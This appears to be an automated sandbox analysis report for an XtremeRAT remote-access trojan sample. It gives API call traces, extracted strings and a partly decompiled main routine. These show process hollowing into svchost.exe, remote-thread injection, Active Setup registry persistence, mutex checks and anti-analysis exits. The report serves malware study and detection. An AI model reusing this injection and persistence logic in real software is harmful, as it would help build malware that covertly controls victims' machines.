GetLastError.KERNEL32(00000000,00000000,DSma9HnKaPERSIST,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000), ref: 00C8A17F
CloseHandle.KERNEL32(00000000), ref: 00C8A18C
CloseHandle.KERNEL32(00000000), ref: 00C8A1FD

Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

Part of subcall function 00C83EA8: CreateProcessW.KERNEL32(00000000,019A0000,00000000,00000000,00000000,00000004,00000000,00000000,?,00C91F1C), ref: 00C83ED5
Part of subcall function 00C83EA8: TerminateProcess.KERNEL32(00000000,00000000), ref: 00C83EFA
Part of subcall function 00C83EA8: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,00C91F1C), ref: 00C83F3B
Part of subcall function 00C83EA8: Sleep.KERNEL32(00000064), ref: 00C83F64

Part of subcall function 00C83B10: OpenProcess.KERNEL32(00000410,00000000,0000017C), ref: 00C83B23
Part of subcall function 00C83B10: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00C83B8B,?,00000410,00000000,0000017C), ref: 00C83B4D
Part of subcall function 00C83B10: GetModuleFileNameExW.PSAPI(?,00000000,?,00000104,00000000,00000208,00001000,00000004,00000000,00C83B8B,?,00000410,00000000,0000017C), ref: 00C83B64
Part of subcall function 00C83B10: CloseHandle.KERNEL32(?), ref: 00C83B85

Part of subcall function 00C83094: CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00C830BA
Part of subcall function 00C83094: CloseHandle.KERNEL32(00000000), ref: 00C830C0
Part of subcall function 00C83094: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00000000,40000000,00000002,00000000,00000002,00000080,00000000,00C8E07C,00000000,00C8A302,00000002), ref: 00C830D3
Part of subcall function 00C83094: FindExecutableW.SHELL32(00000000,00000000,00000000), ref: 00C830DE
Part of subcall function 00C83094: DeleteFileW.KERNEL32(00000000,00000000,00000208,00001000,00000004,00000000,00000000,40000000,00000002,00000000,00000002,00000080,00000000,00C8E07C,00000000,00C8A302), ref: 00C830E4

SetFileAttributesW.KERNEL32(00000000,00000080,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000), ref: 00C8A362
GetModuleFileNameW.KERNEL32(00000000,svchost.exe,0000020A,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000), ref: 00C8A416
GetCurrentProcessId.KERNEL32(00000002,DSma9HnKa,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000), ref: 00C8A452
CloseHandle.KERNEL32(000000D8), ref: 00C8A49E

Part of subcall function 00C84600: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00C846D4
Part of subcall function 00C84600: Sleep.KERNEL32(000000C8,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,00C848A9,?,00C8FCCC,00000000), ref: 00C846F4
Part of subcall function 00C84600: GetThreadContext.KERNEL32(?,?), ref: 00C84707
Part of subcall function 00C84600: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,000000C8,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00C84727
Part of subcall function 00C84600: NtUnmapViewOfSection.NTDLL(?,?), ref: 00C84737
Part of subcall function 00C84600: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000004,?,?,?,00000004,?,000000C8,00000000,?,00000000,00000000,00000000), ref: 00C84758
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,00000000,?,?,?,?,?,00003000,00000004,?,?,?,00000004,?,000000C8), ref: 00C84777
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,?), ref: 00C84809
Part of subcall function 00C84600: VirtualProtectEx.KERNEL32(?,?,?,00000040,?,?,?,?), ref: 00C8482C
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,?,00000004,?,?,?,00000000,?,?,?,?,?,00003000,00000004,?), ref: 00C84854
Part of subcall function 00C84600: SetThreadContext.KERNEL32(?,?), ref: 00C84885
Part of subcall function 00C84600: ResumeThread.KERNEL32(?,?,?,?,00000004,?,?,?,00000000,?,?,?,?,?,00003000,00000004), ref: 00C8489A

Sleep.KERNEL32(000003E8,00C91F1C,000000D8,00000000,00000000,00000002,DSma9HnKa,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C8A4C0
ExitProcess.KERNEL32(00000000,000003E8,00C91F1C,000000D8,00000000,00000000,00000002,DSma9HnKa,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C8A4C7
CloseHandle.KERNEL32(000000D8), ref: 00C8A4DB
TerminateProcess.KERNEL32(0000017C,00000000,00000000,00000000,00000000,DSma9HnKa,000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C8A5D5

Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(user32.dll), ref: 00C88BE5
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(urlmon.dll), ref: 00C88BEF
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(wininet.dll), ref: 00C88BF9
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C88C03
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(Shell32.dll), ref: 00C88C0D
Part of subcall function 00C88BC0: GetLastError.KERNEL32(00000000,00000000,?,Shell32.dll,advapi32.dll,wininet.dll,urlmon.dll,user32.dll,00000000,00C88E3F,?,00000000,00000001,00000000,00000000,00000000), ref: 00C88C25
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,00000000,00000000,?,Shell32.dll,advapi32.dll,wininet.dll,urlmon.dll,user32.dll,00000000,00C88E3F,?,00000000,00000001,00000000,00000000), ref: 00C88C33
Part of subcall function 00C88BC0: Sleep.KERNEL32(0000000A,00000000), ref: 00C88DBC
Part of subcall function 00C88BC0: CloseHandle.KERNEL32(?), ref: 00C88DD4
Part of subcall function 00C88BC0: CloseHandle.KERNEL32(?), ref: 00C88DDD
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,?,?,0000000A,00000000), ref: 00C88DFF
Part of subcall function 00C88BC0: ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00C88E18
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,00000000,open,?,00000000,00000000,00000000,?,?,0000000A,00000000), ref: 00C88E1F

CloseHandle.KERNEL32(000000D8), ref: 00C8A4FF

Part of subcall function 00C83CE4: GetModuleHandleA.KERNEL32(00000000), ref: 00C83CFC
Part of subcall function 00C83CE4: VirtualFreeEx.KERNEL32(0000017C,?,00000000,00008000), ref: 00C83D26
Part of subcall function 00C83CE4: VirtualAllocEx.KERNEL32(0000017C,?,?,00003000,00000040,0000017C,?,00000000,00008000), ref: 00C83D35
Part of subcall function 00C83CE4: GetModuleHandleA.KERNEL32(00000000,?,?,0000017C,?,?,00003000,00000040,0000017C,?,00000000,00008000), ref: 00C83D48
Part of subcall function 00C83CE4: WriteProcessMemory.KERNEL32(0000017C,?,00000000,00000000,?,?,0000017C,?,?,00003000,00000040,0000017C,?,00000000,00008000), ref: 00C83D50
Part of subcall function 00C83CE4: CreateRemoteThread.KERNEL32(0000017C,00000000,00000000,?,?,00000000,?), ref: 00C83D71
Part of subcall function 00C83CE4: CloseHandle.KERNEL32(0000017C), ref: 00C83D77

Sleep.KERNEL32(000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000), ref: 00C8A522
TerminateProcess.KERNEL32(0000017C,00000000,000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000), ref: 00C8A53E
GetLastError.KERNEL32(00000000,00000000,DSma9HnKa,000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C), ref: 00C8A568
CloseHandle.KERNEL32(00000000), ref: 00C8A576
TerminateProcess.KERNEL32(0000017C,00000000,00000000,00000000,00000000,DSma9HnKa,000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C8A58D

Part of subcall function 00C840F8: DeleteFileW.KERNEL32(00000000,00000004,00000000,00000002,00000000,00000002,00000000,?,00000000,00C8453A,?,00000000,00000001,00000000,00000351,00000000), ref: 00C84496
Part of subcall function 00C840F8: ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 00C844E1
Part of subcall function 00C840F8: ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00C844FA

ShellExecuteW.SHELL32(00000000,open,00C30000,00000000,00000000,00000000), ref: 00C8A600

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Part of subcall function 00C87B84: SetFileAttributesW.KERNEL32(019E0000,00000080,00000000,00C87D2A,?,00000000,00000000), ref: 00C87C1D
Part of subcall function 00C87B84: CreateFileW.KERNEL32(019E0000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C87C37
Part of subcall function 00C87B84: GetFileSize.KERNEL32(00000000,00000000,019E0000,80000000,00000001,00000000,00000003,00000000,00000000,019E0000,00000080,00000000,00C87D2A,?,00000000,00000000), ref: 00C87C4A
Part of subcall function 00C87B84: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,00000000,019E0000,80000000,00000001,00000000,00000003,00000000,00000000,019E0000,00000080,00000000), ref: 00C87C6C
Part of subcall function 00C87B84: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00001000,00000040,00000000,00000000,019E0000,80000000,00000001,00000000,00000003,00000000), ref: 00C87C7D
Part of subcall function 00C87B84: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00C87C95
Part of subcall function 00C87B84: DeleteFileW.KERNEL32(019E0000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00001000,00000040,00000000,00000000,019E0000,80000000,00000001), ref: 00C87CEE
Part of subcall function 00C87B84: CloseHandle.KERNEL32(00000000), ref: 00C87D0F

Part of subcall function 00C83A54: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C83A65
Part of subcall function 00C83A54: Process32FirstW.KERNEL32(00000000,?), ref: 00C83A7A
Part of subcall function 00C83A54: CharUpperW.USER32(019A0000), ref: 00C83A94
Part of subcall function 00C83A54: CharUpperW.USER32(00000000), ref: 00C83AA4
Part of subcall function 00C83A54: CharUpperW.USER32(019A0000), ref: 00C83ABF
Part of subcall function 00C83A54: CharUpperW.USER32(?), ref: 00C83ACA
Part of subcall function 00C83A54: Process32NextW.KERNEL32(00000000,?), ref: 00C83AEC
Part of subcall function 00C83A54: CloseHandle.KERNEL32(00000000), ref: 00C83AF6

Part of subcall function 00C89840: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\FakeMessage,00000000,00000001), ref: 00C89855
Part of subcall function 00C89840: RegQueryValueExW.ADVAPI32(?,FakeMessage,00000000,?,00000000,?,80000001,SOFTWARE\FakeMessage,00000000,00000001), ref: 00C89876
Part of subcall function 00C89840: RegCloseKey.ADVAPI32(00000000,?,FakeMessage,00000000,?,00000000,?,80000001,SOFTWARE\FakeMessage,00000000,00000001), ref: 00C8988C

Part of subcall function 00C898DC: LoadLibraryA.KERNEL32(user32.dll), ref: 00C898EA
Part of subcall function 00C898DC: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C898F4
Part of subcall function 00C898DC: LoadLibraryA.KERNEL32(shell32.dll), ref: 00C898FE
Part of subcall function 00C898DC: LoadLibraryA.KERNEL32(shlwapi.dll), ref: 00C89908
Part of subcall function 00C898DC: MessageBoxW.USER32(00000000,?,?,00000000), ref: 00C899C3

Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88934
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C8894D
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88966
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C8897F
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88998
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C889B1
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C889CA
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C889E3
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C889FC
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88A15
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88A2E
Part of subcall function 00C88918: GetTickCount.KERNEL32(00000000), ref: 00C88A40
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88A57
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88A6C
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88A81
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88A96
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88AAB
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88AC0
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88AD5
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88AEA
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88AFF
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88B14
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88B29
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88B3E
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88B53
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88B68
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88B78
Part of subcall function 00C88918: GetTickCount.KERNEL32(00000000), ref: 00C88B8B
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88BB2

Strings

Software\Microsoft\Active Setup\Installed Components\{K5VVB854-OYR7-D8JQ-5HC0-X32C3UKV4ROA}, xrefs: 00C8A133
XTREME, xrefs: 00C8A42F
5/3/2018 10:11:44 AM, xrefs: 00C89ED9, 00C89EE3
.cfg, xrefs: 00C89D01, 00C89D30
svchost.exe, xrefs: 00C8A196
Software\Microsoft\Active Setup\Installed Components\, xrefs: 00C8A11C
C:\Users\user\AppData\Roaming\Microsoft\Windows\DSma9HnKa.cfg, xrefs: 00C89ECD, 00C8A3A6
C:\Windows\InstallDir\Server.exe, xrefs: 00C8A107
CONFIG, xrefs: 00C89CB4, 00C89D77, 00C89DFB, 00C89E43
svchost.exe, xrefs: 00C89F3E, 00C89F4A, 00C8A1A5, 00C8A1C2, 00C8A1D7, 00C8A40F, 00C8A420
local, xrefs: 00C8A3EF
SOFTWARE\, xrefs: 00C8A472
C:\Windows\InstallDir\, xrefs: 00C8A156
SOFTWARE\XtremeRAT, xrefs: 00C89CC8
explorer.exe, xrefs: 00C8A383
DSma9HnKaPERSIST, xrefs: 00C8A16F
{K5VVB854-OYR7-D8JQ-5HC0-X32C3UKV4ROA}, xrefs: 00C8A117
DSma9HnKa, xrefs: 00C89CF3, 00C89D22, 00C89E72, 00C89EEA, 00C8A0C8, 00C8A558
SOFTWARE\, xrefs: 00C89EEF, 00C8A0CD
.xtr, xrefs: 00C8A3C2
DSma9HnKa, xrefs: 00C8A3B0, 00C8A44B
%DEFAULTBROWSER%, xrefs: 00C8A208, 00C8A23C, 00C8A286
ServerStarted, xrefs: 00C89EFB
Mutex, xrefs: 00C8A489
InstalledServer, xrefs: 00C8A0D9
\Microsoft\Windows\, xrefs: 00C89CDC
XTREMEUPDATE, xrefs: 00C89C5A
open, xrefs: 00C89C47, 00C8A5F9

Memory Dump Source

Source File: 00000003.00000002.14987723130.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000002.14987701888.00C80000.00000002.sdmp
Associated: 00000003.00000002.14987831627.00C8B000.00000004.sdmp
Associated: 00000003.00000002.14987969368.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_server.jbxd

Yara matches

Function 00C89AEE, Relevance: 98.6, APIs: 28, Strings: 28, Instructions: 589
sleep

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			E00C89AEE(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v24;
				char _v6196;
				char _v6200;
				char _v6204;
				char _v6208;
				char _v6212;
				char _v6216;
				signed int _t35;
				char* _t42;
				void* _t50;
				long _t51;
				void* _t64;
				void* _t72;
				void* _t77;
				void* _t79;
				void* _t85;
				void* _t101;
				short* _t106;
				short* _t112;
				short* _t122;
				intOrPtr _t138;
				intOrPtr _t143;
				intOrPtr* _t144;
				intOrPtr _t146;
				intOrPtr* _t147;
				void* _t150;
				void* _t152;
				void* _t154;
				long _t155;
				short* _t164;
				int* _t166;
				void* _t168;
				int* _t171;
				void* _t173;
				intOrPtr _t175;
				int* _t177;
				void* _t179;
				intOrPtr _t181;
				void* _t183;
				intOrPtr* _t190;
				void* _t202;
				intOrPtr* _t204;
				intOrPtr _t226;
				void* _t227;
				void* _t228;
				intOrPtr _t230;
				intOrPtr _t233;
				intOrPtr _t237;
				WCHAR* _t240;
				intOrPtr _t248;
				void* _t254;
				WCHAR* _t256;
				short* _t258;
				void* _t279;
				short* _t280;
				short* _t302;
				void* _t303;
				short* _t306;
				short* _t308;
				void* _t311;
				void* _t319;
				WCHAR* _t345;
				signed int _t348;
				void* _t383;
				void* _t386;
				intOrPtr _t396;
				void* _t406;
				short* _t416;
				intOrPtr _t421;
				intOrPtr _t423;
				intOrPtr* _t427;
				intOrPtr _t431;
				intOrPtr* _t433;
				intOrPtr _t452;
				intOrPtr _t457;
				void* _t458;
				intOrPtr _t459;
				intOrPtr _t461;
				void* _t463;
				void* _t470;
				WCHAR* _t476;
				void* _t481;
				intOrPtr _t482;
				void* _t484;
				void* _t486;
				void* _t487;
				intOrPtr _t489;
				intOrPtr _t490;
				void* _t508;

				_t480 = __esi;
				_t341 = __ebx;
				asm("adc al, [eax]");
				 *__eax =  *__eax + __eax;
				asm("clc");
				0xc8();
				_t35 = __eax - 0x00000001 & 0x23e000c8;
				asm("enter 0xa400, 0x23");
				asm("enter 0xbc00, 0x25");
				asm("enter 0x8c00, 0x25");
				asm("enter 0x5400, 0x29");
				asm("enter 0x2400, 0x29");
				asm("enter 0x8c00, 0x29");
				asm("enter 0x5c00, 0x29");
				asm("enter 0x800, 0x2b");
				asm("enter 0xd800, 0x2a");
				asm("enter 0x7800, 0x2d");
				asm("enter 0x4800, 0x2d");
				asm("enter 0xd000, 0x3c");
				asm("enter 0x8800, 0x3c");
				asm("enter 0xc400, 0x3f");
				asm("enter 0x9400, 0x3f");
				asm("enter 0x6400, 0x40");
				asm("enter 0x3400, 0x40");
				asm("enter 0xe000, 0x45");
				asm("enter 0xb000, 0x45");
				asm("enter 0xc00, 0x49");
				asm("enter 0xdc00, 0x48");
				asm("enter 0x6c00, 0x50");
				asm("enter 0x3c00, 0x50");
				asm("enter 0xdc00, 0x79");
				asm("enter 0xa000, 0x79");
				asm("enter 0x1800, 0x7e");
				asm("enter 0xd000, 0x7d");
				asm("enter 0xc00, 0x81");
				asm("enter 0xdc00, 0x80");
				asm("enter 0xc800, 0x88");
				asm("enter 0x9800, 0x88");
				asm("enter 0x0, 0x0");
				 *_t35 =  *_t35 + _t35;
				asm("enter 0x300, 0x0");
				 *_t35 =  *_t35 + _t35;
				asm("enter 0xd800, 0xb0");
				asm("enter 0x6800, 0x9a");
				asm("enter 0xd400, 0xb0");
				asm("enter 0x5400, 0x9a");
				asm("enter 0x5500, 0x8b");
				_t486 = _t487;
				_push(_t35);
				_t489 = _t487 + 0xffffffffffffe7c0;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v6212 = 0;
				_v6216 = 0;
				_v6208 = 0;
				_v6204 = 0;
				_v6200 = 0;
				_v24 = 0;
				E00C82504(0xc89af0);
				_push(_t486);
				_push(0xc8a62b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t489;
				E00C81618(0xc89b88);
				_t42 =  *0xc8b108; // 0xc8b018
				 *_t42 = 1;
				SetErrorMode(0x8007); // executed
				Sleep(0x64); // executed
				E00C81C90( &_v24, E00C83420(1, __ebx, __esi));
				_t396 =  *0xc8b0d4; // 0x0
				E00C81DBC(_v24, _t396);
				if(0 == 0) {
					ShellExecuteW(0, L"open", E00C83420(0, __ebx, _t480), 0, 0, 0);
					ExitProcess(0);
				}
				_t50 = E00C8263C(0, 0, L"XTREMEUPDATE"); // executed
				_t470 = _t50;
				_t51 = GetLastError();
				_t495 = _t51 - 0xb7;
				if(_t51 == 0xb7) {
					Sleep(0x1770);
				}
				CloseHandle(_t470);
				E00C8291C();
				E00C83FDC(0,  &_v6196);
				_t481 =  &_v6196;
				memcpy(0xc8e07c, _t481, 0x607 << 2);
				_t490 = _t489 + 0xc;
				_t473 = _t481 + 0xc0e;
				E00C82B90(0xc8e07c, _t341, L"CONFIG", 0x181c, _t481 + 0xc0e, _t481, _t495);
				SHDeleteKeyW(0x80000001, L"SOFTWARE\\XtremeRAT"); // executed
				_t342 = E00C833A8(E00C8310C(), L"\\Microsoft\\Windows\\", _t495);
				_t64 = E00C834C4(_t62);
				_t496 = _t64 - 1;
				if(_t64 != 1) {
					_t345 = E00C833A8(E00C833A8(E00C833A8(E00C8310C(), "\\", __eflags), 0xc8f38c, __eflags), L".cfg", __eflags);
				} else {
					_t345 = E00C833A8(E00C833A8(_t342, 0xc8f38c, _t496), L".cfg", _t496);
				}
				_t72 = E00C835B0(_t345);
				_t497 = _t72;
				if(_t72 != 0) {
					SetFileAttributesW(_t345, 0x80);
					 *0xc8f8a0 = E00C835DC(_t345, 0xc8f8a8);
					 *0xc8f8a4 = 0xc8f8a8;
					E00C83674(_t345);
					_t461 =  *0xc8f8a0; // 0x0
					_t319 =  *0xc8f8a8; // 0xc80000
					E00C82B90(_t319, _t345, L"CONFIG", _t461, _t473, _t481, _t497);
					E00C8291C();
					_t463 =  *0xc8f8a8; // 0xc80000
					E00C82914(0xc8e07c, _t463);
					if( *0xc8f690 != 0x1e240) {
						SetFileAttributesW(_t345, 0x80);
						DeleteFileW(_t345);
						E00C8291C();
						E00C83FDC(0,  &_v6196);
						_t481 =  &_v6196;
						memcpy(0xc8e07c, _t481, 0x607 << 2);
						_t490 = _t490 + 0xc;
						_t473 = _t481 + 0xc0e;
						E00C82B90(0xc8e07c, _t345, L"CONFIG", 0x181c, _t481 + 0xc0e, _t481, 0);
					}
				}
				SetFileAttributesW(_t345, 0x80); // executed
				DeleteFileW(_t345); // executed
				 *0xc8f8a8 = E00C81100(0x181c);
				_t77 =  *0xc8f8a8; // 0xc80000
				E00C82914(_t77, 0xc8e07c);
				_t79 =  *0xc8f8a8; // 0xc80000
				E00C82B90(_t79, _t345, L"CONFIG", 0x181c, _t473, _t481, 0);
				_t406 =  *0xc8f8a8; // 0xc80000
				E00C83218(_t345, _t406, 0x181c, 0); // executed
				E00C83674(_t345);
				_t85 = E00C8263C(0, 0, "DSma9HnKa"); // executed
				 *0xc8f8b0 = _t85;
				if(GetLastError() == 0xb7) {
					ExitProcess(0);
				}
				_t482 =  *0xc8f414; // 0x0
				if(_t482 <= 0) {
					L15:
					E00C81C90( &_v6200, _t345);
					E00C81D04(_v6200);
					E00C82914(0xc918fc, _t345);
					E00C89790(0xc8f8b4);
					_t410 = E00C833A8(L"SOFTWARE\\", 0xc8f38c, _t502);
					E00C82F90(0x80000001, _t96, _t502, 2, "5/3/2018 10:11:44 AM"); // executed
					if( *0xc8f5bc == 1) {
						E00C88918(_t410, _t473, 0xc8fccc);
					}
					if( *0xc8f5c9 == 1) {
						_t311 = E00C89840();
						_t505 = _t311;
						if(_t311 == 0) {
							E00C898DC(0xc8e07c);
						}
					}
					GetModuleFileNameW(0, "svchost.exe", 0x20a);
					_t101 = E00C84914(0xc8fac0, _t345, 0xc8e07c, _t473, _t482); // executed
					_t346 = _t101;
					E00C84B88(_t101, 0xc8e07c);
					 *0xc8f898 = E00C833A8(_t101, 0xc8a704, _t505);
					_t506 =  *0xc8f2b1 - 1;
					if( *0xc8f2b1 == 1) {
						_t256 =  *0xc8f898; // 0xc30000
						SetFileAttributesW(_t256, 0x80); // executed
						_t258 =  *0xc8f898; // 0xc30000
						SetFileAttributesW(E00C836D8(_t258, _t506), 0x80); // executed
						E00C81248();
						_push(_t486);
						_push(0xc8a01f);
						_push( *[fs:eax]);
						 *[fs:eax] = _t490;
						_push(E00C812A4(0x1b) + 1);
						_push(E00C812A4(0xa) + 1);
						_push(E00C812A4(0xa) + 1);
						_push(E00C812A4(0xa) + 1);
						_push(E00C812A4(0xb) + 1);
						_t279 = E00C812A4(6);
						_t280 =  *0xc8f898; // 0xc30000
						_pop(_t383); // executed
						E00C83BC4(_t280, _t346, _t383, _t279 + 0x7d1); // executed
						_pop(_t457);
						 *[fs:eax] = _t457;
						_push(_t486);
						_push(0xc8a09d);
						_push( *[fs:eax]);
						 *[fs:eax] = _t490;
						_push(E00C812A4(0x1b) + 1);
						_push(E00C812A4(0xa) + 1);
						_push(E00C812A4(0xa) + 1);
						_push(E00C812A4(0xa) + 1);
						_push(E00C812A4(0xb) + 1);
						_push(E00C812A4(6) + 0x7d1);
						_t302 =  *0xc8f898; // 0xc30000
						_t303 = E00C836D8(_t302, _t506);
						_pop(_t458);
						_pop(_t386); // executed
						E00C83BC4(_t303, _t346, _t386, _t458); // executed
						_pop(_t459);
						 *[fs:eax] = _t459;
						_t306 =  *0xc8f898; // 0xc30000
						E00C83674(_t306);
						_t308 =  *0xc8f898; // 0xc30000
						E00C83674(E00C836D8(_t308, _t506));
					}
					_t106 =  *0xc8f898; // 0xc30000
					E00C82F90(0x80000001, E00C833A8(L"SOFTWARE\\", 0xc8f38c, _t506), _t506, 2, _t106); // executed
					memcpy(0xc8fccc, 0xc8e07c, 0x607 << 2);
					_t476 = 0xc8ec8a;
					_t112 =  *0xc8f898; // 0xc30000
					E00C82E48(_t112);
					_t416 =  *0xc8f898; // 0xc30000
					E00C82914(0xc914e8, _t416);
					E00C82E48(E00C833A8(L"Software\\Microsoft\\Active Setup\\Installed Components\\", 0xc8f302, _t506));
					E00C82914(0xc91b06, _t117);
					_t122 =  *0xc8f898; // 0xc30000
					_t348 = E00C836D8(_t122, _t506);
					E00C82E48(_t348);
					E00C82914(0xc916f2, _t348);
					if( *0xc8f38a == 1) {
						_t240 = E00C8263C(0, 0, "DSma9HnKaPERSIST"); // executed
						_t476 = _t240;
						_t508 = GetLastError() - 0xb7;
						if(_t508 == 0) {
							CloseHandle(_t476);
						} else {
							CloseHandle(_t476);
							 *0xc8f89c = E00C833A8(L"svchost.exe", 0xc8a704, _t508);
							E00C8291C();
							_t248 =  *0xc8f89c; // 0x19a0000
							E00C82E48(_t248);
							_t452 =  *0xc8f89c; // 0x19a0000
							E00C82914(0xc8fac0, _t452);
							 *0xc8f8ac = E00C83EA8(0xc8fac0, 0xc91f1c, _t486);
							_t254 =  *0xc8f8ac; // 0x17c
							E00C83CE4(_t254, 0xc8fccc, E00C88EF8);
						}
					}
					E00C81CD8( &_v6204, 0x11, 0xc8f2b2);
					_t421 =  *0xc8b0dc; // 0x0
					E00C81DBC(_v6204, _t421);
					if(_t508 != 0) {
						E00C81CD8( &_v6208, 0x11, 0xc8f2b2);
						_t423 =  *0xc8b0d8; // 0x0
						E00C81DBC(_v6208, _t423);
						if(__eflags != 0) {
							 *0xc8f89c = E00C833A8(0xc8f2b2, 0xc8a704, __eflags);
							_t138 =  *0xc8f89c; // 0x19a0000
							 *0xc8f8ac = E00C83EA8(_t138, 0xc91f1c, _t486);
							__eflags =  *0xc8f8ac;
							if(__eflags == 0) {
								_t226 =  *0xc8f89c; // 0x19a0000
								_t227 = E00C83A54(_t226, 0xc8f8ac);
								__eflags = _t227;
								if(_t227 != 0) {
									_t228 =  *0xc8f8ac; // 0x17c
									 *0xc8f89c = E00C83B10(_t228);
								} else {
									 *0xc8f89c = E00C83094();
								}
								_t230 =  *0xc8f89c; // 0x19a0000
								 *0xc8f8ac = E00C83EA8(_t230, 0xc91f1c, _t486);
								__eflags =  *0xc8f8ac;
								if(__eflags == 0) {
									 *0xc8f89c = E00C83094();
									_t233 =  *0xc8f89c; // 0x19a0000
									 *0xc8f8ac = E00C83EA8(_t233, 0xc91f1c, _t486);
								}
							}
						} else {
							 *0xc8f89c = E00C83094();
							_t237 =  *0xc8f89c; // 0x19a0000
